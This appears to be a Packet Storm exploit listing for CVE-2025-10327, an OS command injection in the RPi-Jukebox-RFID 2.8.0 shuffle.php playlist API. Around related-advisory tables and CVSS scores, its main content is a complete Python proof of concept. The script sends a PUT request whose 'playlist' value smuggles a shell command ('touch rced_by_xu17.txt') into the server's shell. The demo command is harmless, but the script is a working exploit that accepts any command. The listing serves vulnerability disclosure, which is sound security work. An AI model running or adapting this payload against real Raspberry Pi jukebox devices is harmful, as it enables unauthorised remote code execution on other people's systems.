RPi-Jukebox-RFID 2.8.0 Remote Code Execution

Published: 20 Jan 2026 00:00:00. Reported by Beatriz Fresno Naumova. Type: packetstorm. Source: packetstorm.news. 112 views.

OS command injection in RPi-Jukebox-RFID 2.8.0 shuffle.php via playlist (CVE-2025-10327) with proof.

Related

| Family | Title | Published | Views | Reporter |
| --- | --- | --- | --- | --- |
| Circl | CVE-2025-10327 | 12 Sep 2025 23:17 | – | circl |
| CNNVD | RPi-Jukebox-RFID operating system command injection vulnerability | 12 Sep 2025 00:00 | – | cnnvd |
| CVE | CVE-2025-10327 | 12 Sep 2025 21:02 | – | cve |
| Cvelist | CVE-2025-10327 MiczFlor RPi-Jukebox-RFID shuffle.php os command injection | 12 Sep 2025 21:02 | – | cvelist |
| Exploit DB | RPi-Jukebox-RFID 2.8.0 - Remote Command Execution | 17 Jan 2026 00:00 | – | exploitdb |
| EUVD | EUVD-2025-29077 | 3 Oct 2025 20:07 | – | euvd |
| NVD | CVE-2025-10327 | 12 Sep 2025 21:15 | – | nvd |
| Positive Technologies | PT-2025-37354 | 12 Sep 2025 00:00 | – | ptsecurity |
| RedhatCVE | CVE-2025-10327 | 14 Sep 2025 22:31 | – | redhatcve |
| Vulnrichment | CVE-2025-10327 MiczFlor RPi-Jukebox-RFID shuffle.php os command injection | 12 Sep 2025 21:02 | – | vulnrichment |

# Exploit Title: RPi-Jukebox-RFID 2.8.0 - Remote Code Execution
# Date: 2025-09-25
# Exploit Author: Beatriz Fresno Naumova
# Vendor Homepage: https://github.com/MiczFlor/RPi-Jukebox-RFID
# Software Link: https://github.com/MiczFlor/RPi-Jukebox-RFID/releases/tag/v2.8.0
# Version: 2.8.0
# Tested on: Raspberry Pi OS with RPi-Jukebox-RFID v2.8.0
# CVE: CVE-2025-10327
#
# Description:
# This PoC demonstrates an OS command injection vulnerability in the shuffle.php API endpoint.
# The vulnerable parameter "playlist" is passed directly to a shell command without sanitization,
# allowing an attacker to execute arbitrary system commands.

import requests
import json

# Replace this with the actual target IP or hostname
TARGET = "http://YOUR-TARGET-IP/phoniebox/api/playlist/shuffle.php"

# Payload to inject – here we create a file as proof of execution
INJECTED_COMMAND = "test';touch rced_by_xu17.txt;echo '"

# JSON payload for the request
payload = {
    "playlist": INJECTED_COMMAND,
    "shuffle": "true"
}

# HTTP headers
headers = {
    "Content-Type": "application/json",
    "User-Agent": "Mozilla/5.0"
}

def exploit():
    print("[+] Sending malicious JSON payload to trigger command injection...")
    try:
        response = requests.put(TARGET, headers=headers, data=json.dumps(payload), timeout=5)
        print(f"[+] HTTP Status Code: {response.status_code}")
        print("[*] If the target is vulnerable, the command should be executed on the server.")
    except Exception as e:
        print(f"[-] Exploit failed: {e}")

if __name__ == "__main__":
    exploit()


Scores (current as of 20 Jan 2026 00:00)

Vulners AI Score: 6.9 (medium risk)
CVSS 3.1: 6.3 - 9.8
CVSS 4: 5.3
CVSS 2: 6.5
CVSS 3: 6.3
EPSS: 0.03856
SSVC